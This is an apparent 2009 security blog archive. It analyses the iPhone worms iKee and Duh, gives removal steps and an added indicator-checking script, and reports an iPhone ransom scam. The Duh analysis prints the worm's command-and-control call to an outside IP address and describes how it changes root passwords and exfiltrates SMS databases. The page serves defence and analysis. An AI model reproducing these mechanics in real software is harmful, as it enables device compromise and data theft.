Archive for November, 2009

2010 Security Outlook

In 2009, many in the IT industry lost their jobs because of the tremendous pressure to cut costs so that companies could get through and survive the recession. However, not everything in IT was gloomy: IT services aligned with cost reduction and value creation, such as virtualization, SaaS and cloud services, are on the rise and are expected to grow in the coming year.

Because we have been in a difficult situation, where IT companies are expected to cut costs, keep their customers and at the same time adapt to changing market opportunities, many of us have worked in survival mode. This gives organized cyber criminals the opportunity to become more sophisticated and to expand their capabilities.

Of Gartner’s futuristic security scenarios, “Perpetual Arm Race” is very close to what we have encountered this year, and I believe it will continue for the next couple of years.

This is a perpetual fight where success changes sides. Hackers, cybercriminals, and criminal consortia invent and launch relentless and powerful attacks on enterprises and individuals. Enterprises and vendors relentlessly work on advancing protective measures, launch pre-emptive actions against hackers, and apply law and technology. Advanced technology laboratories exist inside vendors’ facilities, as well as inside criminal structures. Web business functions decently, but all necessary security precautions are taken.

The “Security Nirvana” scenario, though, is the direction we look forward to.

The “good guys” prevail over the “bad guys.” Enterprises’ and vendors’ security specialists are always a few steps ahead of hackers. Security measures have created an impeccable shield around enterprises. Procured and subscribed software is “security bug-free.” This is a world without the fear of hackers. The entire world is happily and securely interconnected.

Yet another glorified bad behavior

“The author of the first iPhone worm “iKee” has been given a job with Australian iPhone app developer Mogeneration” [Read SC]

We heard a similar story earlier this year, when the author of the Twitter worm “Mikkey” landed a job at exqSoft Solutions.

“adolescents engage in bad behaviour because they find benefits — such as the immediate gratification of peer acceptance — are worth the risks,” as published in the journal Psychological Science.

Does this trend justify a pattern in which crimes “in the public interest” are not prosecuted but glorified instead?

Analysis of “Duh”

I just published the analysis of “Duh”, also known as “iKee.b”, the latest iPhone worm. [read]

• Propagation: It targets jailbroken iPhones with SSH enabled and attempts to log in remotely using the default iPhone password. “sshd” is the component responsible for scanning the network, and it targets a pre-defined list of 3G provider address ranges in Australia, the Netherlands, Austria, Hungary and Portugal.


• Installation: It creates the /private/var/mobile/home directory, drops “cydia.tgz” there and extracts the following content:

syslog – This is the reporting bot, which runs every 5 minutes through a launchd job. It is a shell script that performs the following:

• Establishes communication with the remote server through the worm’s own HTTP communicator “duh”:

/private/var/mobile/home/duh 92.61.38.16 /xml/p.php?id=$ID

• The remote server is expected to reply; the worm stores the reply as a temporary file, /private/var/mobile/home/.tmp.
• It marks the communication with 1 if this is the first contact, otherwise with 2.
• It then appends this information to the temporary file, saves the result as /private/var/mobile/home/heh and executes it as a shell script.

inst – A malicious shell script used to install the worm. It is executed after the content of cydia.tgz has been extracted.

• Checks for an infection marker to avoid re-installation. This is necessary because the worm runs continuously in the background through the launchd jobs.
• Creates the ID that is used in all communication with the master server.
• Installs legitimate packages that are then used to gather and steal information.
• Modifies the root password.
• Gathers information such as the iPhone OS version and the SMS message database (sms.db).
• Compresses the gathered information as {ID}.tgz.
• Establishes communication with the remote server and reports the stolen information back in base64-encoded form.

duh – This is an iPhone executable responsible for the worm’s bot HTTP communication. This is where the malware name “Duh” was derived from.

Updated 11/12/2009: A good analysis was recently published at Fortinet’s blog. As I mentioned, this worm is similar to OSX Jahlav and DNSChanger, in that the group behind it mostly copies exact source code found around the internet and uses it to its own advantage. In this case, a Fortinet researcher found that the “duh” code is similar to “htmlget.c”, which can easily be found on the internet and is indeed NOT malicious by itself.

I absolutely agree with these findings; however, similarly to “NC” (the netcat utility), it could be used for good, but in this specific case of the iPhone worm package it was used to do evil 😉

curl_7.19.4-6_iphoneos_arm.deb – This is a legitimate package of Curl for iPhone, used by this worm to install the following packages:
• adv-cmds_119-5_iphoneos-arm.deb
• sqlite3_3.5.9-9_iphoneos-arm.deb

com.apple.period.plist – This is a launchd job that executes the worm’s bot “syslog” every 5 minutes.

• Startup Entries: The worm uses LaunchDaemons to run its shell scripts at specific time intervals:
/System/Library/LaunchDaemons/com.apple.periodic.plist launches /private/var/mobile/home/syslog every 2000 sec. (~33 minutes)
/System/Library/LaunchDaemons/com.apple.period.plist launches /private/var/mobile/home/syslog every 300 sec. (5 minutes)
/System/Library/LaunchDaemons/com.apple.ksyslog.plist launches /private/var/mobile/home/sshd using the “RunAtLoad” and “KeepAlive” keys so that it keeps running.

New iPhone Worm

Mikko of F-Secure blogged about a new iPhone worm that is similar to iKee; only this time it has reporting-bot capability, communicating with a web-based C&C.

This has been confirmed by xs4all.

Further reading – Malicious iPhone Worm.

iPhone worm “iKee”

Name: Worm iKee

Author: ike_x

Location: Sydney, Australia

Discovered: November 6, 2009 – Friday at 12:15 pm by sierralpha @ whirlpool forum

Report details: 3GS 16gb
Os 3.1.2 (7D11) on OPTUS
Jailbroken with Blackra1n
Running Cydia, Winterboard and Installous

Description:

Worm iKee targets jailbroken iPhones and takes advantage of the SSH service, which allows remote user logins with the default password.

From an interview by JD, the author explains:

As for users that are infected, there are two common denominators: they all have hacked iPhones (known to the hacking community as “JailBroken”), and they all use an SSH Daemon, allowing users to connect to their phones remotely and attempt to log in.

Worm Propagation Method: SSH service using default password

Author recommendation:

Users that have already “JailBroken” their iPhones should immediately change the root account password, even if they have not installed an SSH Daemon.

Worm Behaviour:

– iKee overwrites Cydia files with its working code

“Cydia is a replacement packaging and repository manager for the original Installer.app for the iPhone or iPod touch”

– Changes the iPhone owner’s wallpaper, replacing it with a photo known from the cross-platform joke “RICKROLL” (“Never Gonna Give You Up” by Rick Astley); I remember capturing a video of it and uploading it to YouTube.

– Deletes SSH Daemon

– It scans pre-defined IP addresses to infect and spread to other vulnerable iPhone users (according to the SANS diary, all IP addresses belong to 3G customers in Australia and are hardcoded in the worm).

Image source: forums.whirlpool.net.au – “iKee changes infected iPhone user’s wallpaper”

How to remove iKee:

The author explained (in JD’s interview) that there are 4 variants of this worm; here is how to remove them:

Variants A-C store their files at the following paths, so you have to remove them (you may use rm in the terminal):

– /bin/poc-bbot
– /bin/sshpass
– /var/log/youcanbeclosertogod.jpg
– /var/mobile/LockBackground.jpg
– /System/Library/LaunchDaemons/com.ikey.bbot.plis
– /var/lock/bbot.lock

Then reboot the phone, change your password and reinstall SSH.

For variant D, remove the following files:

– /usr/libexec/cydia/startup
– /usr/libexec/cydia/startup.so
– /usr/libexec/cydia/startup-helper
– /System/Library/LaunchDaemons/com.saurik.Cydia.Startup.plist

Reinstall Cydia.

Remember to change your root password!

Follow this instruction.
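Putting the file indicators from the Duh analysis and the iKee removal notes above into one check, here is an added script (not from the original posts) that looks for the listed paths and for any LaunchDaemon plist pointing into the worm’s home directory, which is how the rewritten com.apple.periodic.plist can be caught. The ROOT prefix, the function names and the constructed test tree are assumptions of this example; the paths themselves are the ones quoted in the posts.

```shell
#!/bin/sh
# Added example (not from the original posts): offline check for the file
# indicators the posts list for iKee (variants A-C) and Duh/iKee.b. ROOT is
# an assumed prefix so the same code runs against a mounted backup or a
# constructed test tree; pass "" to check the live device.
# Paths copied from the posts; none belongs to legitimate software, so
# presence alone is a strong indicator.
IKEE_PATHS="/bin/poc-bbot /bin/sshpass /var/log/youcanbeclosertogod.jpg
/var/mobile/LockBackground.jpg /System/Library/LaunchDaemons/com.ikey.bbot.plis
/var/lock/bbot.lock"
DUH_PATHS="/private/var/mobile/home/duh /private/var/mobile/home/syslog
/private/var/mobile/home/inst /private/var/mobile/home/heh
/System/Library/LaunchDaemons/com.apple.period.plist
/System/Library/LaunchDaemons/com.apple.ksyslog.plist"
# count_present ROOT PATH... -> hits on stderr, count on stdout.
count_present() {
  root=$1; shift
  n=0
  for p in "$@"; do
    if [ -e "$root$p" ]; then
      echo "FOUND $root$p" >&2
      n=$((n + 1))
    fi
  done
  echo "$n"
}
# Duh rewrote the legitimately named com.apple.periodic.plist to launch its
# bot, so a name check misses it; look inside every LaunchDaemon plist for a
# program path under the worm's home directory instead. The variant D Cydia
# startup files have the same problem and need manual review.
count_tainted_daemons() {
  dir="$1/System/Library/LaunchDaemons"
  n=0
  for f in "$dir"/*.plist; do
    [ -f "$f" ] || continue
    if grep -q '/private/var/mobile/home/' "$f"; then
      echo "TAINTED $f" >&2
      n=$((n + 1))
    fi
  done
  echo "$n"
}
# scan ROOT -> summary; any non-zero count means clean up as the posts describe.
scan() {
  echo "iKee:$(count_present "$1" $IKEE_PATHS) Duh:$(count_present "$1" $DUH_PATHS) tainted-daemons:$(count_tainted_daemons "$1")"
}
if [ $# -gt 0 ]; then scan "$1"; fi
```

Run it as `sh check.sh /path/to/mounted/backup` or `sh check.sh ""` on the device itself; a clean system prints all three counts as 0.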

Your iPhone’s been hacked…€5 to unlock

Dutch hacker holds jailbroken iPhones “hostage” for €5 – Source: Ars Technica [read]


It appears one enterprising Dutch hacker used port scanning to identify jailbroken iPhones on T-mobile Netherlands with SSH running. Enabling SSH is a common procedure for jailbroken iPhones, allowing a user to log in via Terminal and run standard UNIX commands. Unfortunately, iPhones all have a default root password that many forget to change after jailbreaking, leaving their phone as vulnerable as a Lamborghini parked on a public street with the windows down, the doors unlocked, and the keys in the ignition.

The hacker relied on unchanged root passwords to hack into the phones. He then sent what appears to be an SMS alert to the hacked phones that read, “You iPhone’s been hacked because it’s really insecure! Please visit doiop.com/iHacked and secure your iPhone right now! Right now, I can access all your files.” Going to the website directs the user to send €5 to a PayPal account, after which the hacker will e-mail instructions to remove the hack—which most likely involve restoring the iPhone to factory settings.